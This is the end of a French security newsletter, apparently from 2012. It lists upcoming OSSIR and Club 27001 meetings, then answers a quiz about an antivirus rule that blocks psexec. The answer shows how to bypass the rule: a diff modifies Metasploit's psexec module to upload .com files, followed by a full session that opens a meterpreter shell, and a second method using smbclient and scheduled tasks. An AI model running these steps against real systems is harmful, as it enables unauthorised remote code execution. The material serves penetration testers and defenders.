           - Seconde présentation en cours de confirmation
           - Point divers
     . Réunion suivante à Paris le jeudi 20 septembre à 14h00
           - Programme en cours d'élaboration
     . Prochaine réunion à Toulouse le 27 avril
           - Programme en cours d'élaboration
     . Prochaines à Marseille, Rennes et Lyon annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion mardi 10 avril 2012 à 14h00, à la Librairie
       Eyrolles (RER Saint-Michel, métro Cluny)
         - Titre en cours de confirmation par Rory Higgins et Philippe Marxgut
           (Mancala Networks)
         - Protection des données personnelles et obligations de sécurité
           par Thiebaut Devergranne
         - Revue d'actualité par Nicolas Ruff (EADS)
     . Réunion suivante à Paris le mardi 15 mai 2012
     . Prochaine réunion à Lyon annoncée prochainement
     . Prochaine réunion à Rennes annoncée prochainement
     . Prochaine réunion à Toulouse merdi 15 mai.
     . Réunion suivante à Toulouse à la rentrée de septembre.



--[ 14. Le saviez-vous ? La réponse ]------------------------------------

     La présence d'un antivirus est en fait à l'origine de cette erreur. En
 effet, celui-ci est configuré pour empêcher la copie à distante de fichiers
 exécutables.

 La règle suivante est configurée :
Standard antivirus : Empêcher la création/modification à distance de fichiers
exécutables et de configuration

 La consultation des journaux sur la machine incriminée permet de s'assurer du
 problème :
16/02/2012	15:55:21	Bloqué par une règle de protection de l'accès DOMAIN\ADMIN	
System:Remote	C:\executable.exe	Protection standard antivirus:Empêcher la
création/ modification à distance de fichiers exécutables et de configuration
Action bloquée : Créer

 Pourquoi Psexec est alors concerné ? Parce que psexec copie tout d'abord un 
 exécutable puis le lance comme un service. Il n'échappe donc pas à la règle.

 Toutefois, cette restriction ne concerne que les fichiers possédant
 l'extension ".exe".  Ainsi, le dépôt de fichier .com est autorisé. Il est
 alors possible de modifier le script de psexec pour pouvoir effectuer cette
 action automatiquement :
Iv at zener:exploits/windows/smb>diff psexec.rb psexec2.rb
141c141
< 			filename = rand_text_alpha(8) + ".exe"
---
> 			filename = rand_text_alpha(8) + ".com"
160c160
< 			filename = rand_text_alpha(8) + ".exe"
---
> 			filename = rand_text_alpha(8) + ".com"

 Son utilisation permet ensuite de lancer une charge utile comme meterpreter : 

msf > use exploit/windows/smb/psexec2
msf  exploit(psexec2) > set SMBUser ADMIN
SMBUser => ADMIN
msf  exploit(psexec2) > set SMBPass password
SMBPass => password
msf  exploit(psexec2) > set SMBDomain DOMIN
SMBDomain => DOMAIN
msf  exploit(psexec2) > set RHOST 10.0.0.1
RHOST => 10.0.0.1
msf  exploit(psexec2) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf  exploit(psexec2) > set SHARE C$\\hsc
SHARE => C$\hsc
msf  exploit(psexec2) > exploit

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 10.0.0.1:445|DOMAIN as user 'ADMIN'...
[*] Uploading payload...
[*] Created \hsc\rTRLwkjB.com...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.0.0.1[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.0.0.1[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (RXcdXybp - "MoZfZPGYhMSBIXyPIdFjfsx")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \rTRLwkjB.com...
[*] Sending stage (752128 bytes) to 10.0.0.1
[*] Meterpreter session 1 opened (10.0.0.2:38235 -> 10.0.0.1:4444) at Fri Feb 17 11:33:38 +0100 2012

meterpreter >


 Une autre solution consiste à copier un exécutable via smbclient puis à
 l'exécuter via rpcclient (depuis Linux) :

Iv at zener:~>smbclient -U 'DOMAIN\ADMIN%password' //10.0.0.1/C$
Domain=[DOMAIN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
smb: \> mkdir hsc
smb: \> cd hsc
smb: \hsc\> put executable.com
putting file executable.com as \hsc\executable.com (6517.7 kb/s) (average 6517.8 kb/s)

 La création de service n'étant pas intégrée à samba ou samba-tng, il faut
 passer par les tâches planifiées pour lancer l'exécutable : 

[DOMAIN\ADMIN at 10.0.0.1]$  at 11:08:00 /interactive  "c:\hsc\executable.com"
	Job Information:
	----------------
	Time:        11:08:00
	Schedule:    Once
	Status:      OK
	Interactive: Yes
	Command:     c:\hsc\executable.com

	Job ID:      1

 Le programme sera ensuite lancé à l'heure précisée.

-- Yves Le Provost


Plus d'informations sur la liste de diffusion newsletter